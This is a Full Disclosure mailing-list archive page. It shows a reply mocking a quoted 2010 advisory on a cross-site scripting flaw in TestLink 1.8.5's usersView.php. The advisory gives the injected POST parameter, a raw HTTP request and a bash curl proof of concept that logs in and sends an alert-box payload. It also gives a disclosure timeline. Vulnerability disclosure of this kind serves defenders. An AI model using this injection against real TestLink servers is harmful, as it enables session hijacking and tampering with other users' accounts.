Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sat, 16 Jan 2010 00:03:13 +1100

Prashant,

Usually we do not mention the engineer/dev name's in a timeline, that's
totaly a jackass move.
Anyone civilized would mention in this case :
"{DATE} <VENDOR NAME> says <CRAP>"

Btw posting an "exploit" to trigger a Js alert, it's priceless;
Dude you made my night.




2010/1/15 Prashant <clickprashant () rediffmail com>

1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and
Execution System.
Discovered by: Prashant Khandelwal (clickprashant () gmail com)


2.Vulnerability Information
Class: Cross site scriping
Impact :Code execution
Remotely Exploitable: Yes
Locally Exploitable: No


3. Vulnerable packages.

Versions affected :All versions <= Testlink 1.8.5
Download :
http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc


4. Vulnerability Description

Cross site scriping Vulnerability has been found in Testlink(
http://www.teamst.org/) a popular and acclaimed free, open source Test
management tool written in PHP.
The issue discovered can only be exploited with an authenticated
session.This cross site scripting vulnerability is present in the file
/testlink/lib/usermanagement/usersView.php & can be exploited
by setting the variable "order_by_login_dir" like below with a HTTP POST
request

Example HTTP header (tested on 1.8.5)

Set the POST variable order_by_login_dir to >">alert(726367128870)%3B

Request

POST /testlink/lib/usermanagement/usersView.php HTTP/1.0

Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie:
PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache


operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login


5. Proof Of Concept


======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant () gmail com]
# Cross site scripting in Testlink the Test Management Tool

# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 (
http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for educational purpose and has only been tested with
testlink 1.8.5


if [ $# -ne 3 ]
then

echo "Usage - ./$0 User password Testlink_root_dir_URI"
echo "Example - ./$0 admin admin http://Testlink-Server/testlink";
exit 1
fi

rm -rf cookies userView.php

curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies

curl -d
'"operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login"'
$3/lib/usermanagement/usersView.php -b cookies -v >userView.php

echo "Please open userView.php in browser a java script alert with text
123456789 should pop up"


=====================


6. Report Timeline

I) 5-Jan-2010
Vulnerability dicovered

II) 11-Jan-2010

Notified about the vulnerability to the developer Francisco Mancardi &
Martin Havlat from testlink team

IV) 11-Jan-2010
Francisco Mancardi ask for POC.

V) 14-Jan-2010
POC's given

VI) 15-Jan-2010
Francisco Mancardi says these vulnerabilities cannot be patched at the
moment and has not commited any timeline for fixing the same.


<http://sigads.rediff.com/RealMedia/ads/click_nx.ads/www.rediffmail.com/signatureline.htm () Middle?>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault